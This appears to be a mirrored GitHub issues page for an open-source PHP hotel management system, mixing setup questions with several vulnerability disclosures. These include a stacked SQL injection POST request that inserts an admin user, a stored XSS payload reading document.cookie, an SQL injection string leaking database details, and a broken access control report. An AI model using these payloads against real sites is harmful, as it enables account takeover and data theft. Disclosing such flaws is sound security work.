tramyardg / hotel-mgmt-system Goto Github PK
View Code? Open in Web Editor NEWHotel booking system for customers added with an admin feature to manage reservations.
License: Apache License 2.0
Hotel booking system for customers added with an admin feature to manage reservations.
License: Apache License 2.0
Hey,
I couldn't access the admin panel, it displays an empty page
that's the link i used: http://localhost/hotel-mgmt-system/admin.php
Normalize customer
table in 2NF. The new entity will be called admins
along with existing customer
.
Sq code
Vulnerable path /app/process_update_profile.php
Lines 32-37 of the "process_update_profile.php" don't differentiate the user's permissions and the status of login.
post the data to "process_update_profile.php".Attacker only need a true user's email,then Attacker can change other's password,phone and so on.Attacker can get the account of admin.
check the database,find the differences.
Simple approach is to put pending in the search input value. This will display all the pending rsvp.
The problem was admin credentials are exposed in admin.json
. For security reason, we have to create a field in customer table to tell if the user is admin or not. Therefore, we don't need admin.json
anymore for authenticating admins.
Files to modify:
hotel.sql
app/models/Customer.php
: isAdminSignedIn
Vulnerable path /app/dao/BookingDetailDAO.php
Vulnerable path /app/handlers/BookingDetailHandler.php
Vulnerable path /app/admin/manage_reservation.php
Lines 54-60 of the "BookingDetailDAO.php"
The variable i is spliced into the sql statement.It causes SQL inject.
Lines 63-74 of the "BookingDetailHandler.php"
updateConfirmed
is called by confirmSelection
Line 10 of the "manage_reservation.php"
$bdh->confirmSelection($_POST["item"]);
we could inject through post item
read the README.md and install the project
post the poc code
POST /app/admin/manage_reservation.php HTTP/1.1
Host: localhost
Content-Length: 119
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: elefant_user=ohao1ku87687qe855jotru3o5p; PHPSESSID=19q15nrh1hinhipjeomugnaqd2
Connection: close
confirm=1&item[0]=11;INSERT INTO customer(cid,fullname,email,password,phone,isadmin) values(2,"attack","a","a","1","1")
Is composer necessary to run this? Any tips on how to install an older version of Php using xampp?
edit: i was able to get it.
How do i create an admin credentials?
In the registration and sign in page, add a button or a link to go back to home page.
Vulnerable path /app/process_update_profile.php
Lines 32-37 of the "process_update_profile.php" file,there is no filtering,so cause Cross Site Script.
In fact,the filter was forgot.Another file has a filter . Its path /app/process_registration.php
The data is safe when user register,but it is unsafe after update.
register a new account.
login the user and click "update profile".
input poc and submit.
The administrator will trigger it.
<script>alert('youyou_pm10'+document.cookie);</script>
Hi
Sorry to bother, i was wondering how to access to admin panel?
i setup everything, tried /app /admin.php etc..
Thanks in advance
Any takers? Feel free. You can use the png below
favicon_package_v0.16.zip
Insert the following code in the <head>
section
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
How to fix it?
Simple approach is to put confirmed in the search input value. This will display all the confirmed rsvp.
Vulnerable path /app/dao/CustomerDAO.php
Vulnerable path /app/handlers/CustomerHandler.php
Vulnerable path /app/process_update_profile.php
Lines 49-59 of the "CustomerDAO.php" file splice the sql word,so bypass the PDO.
Line 98 of the "CustomerHandler.php" use the vulnerable function.
Lines 31-40 of the "process_update_profile.php" use the vulnerable function.
After the user logged in, click the button "update proflie".
Then input the poc and click "update".
After that,refresh it and click "update profile",you can see the data from database.
youyou",password = "", phone = concat(database(),version()) WHERE `customer`.`cid`="10"#
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.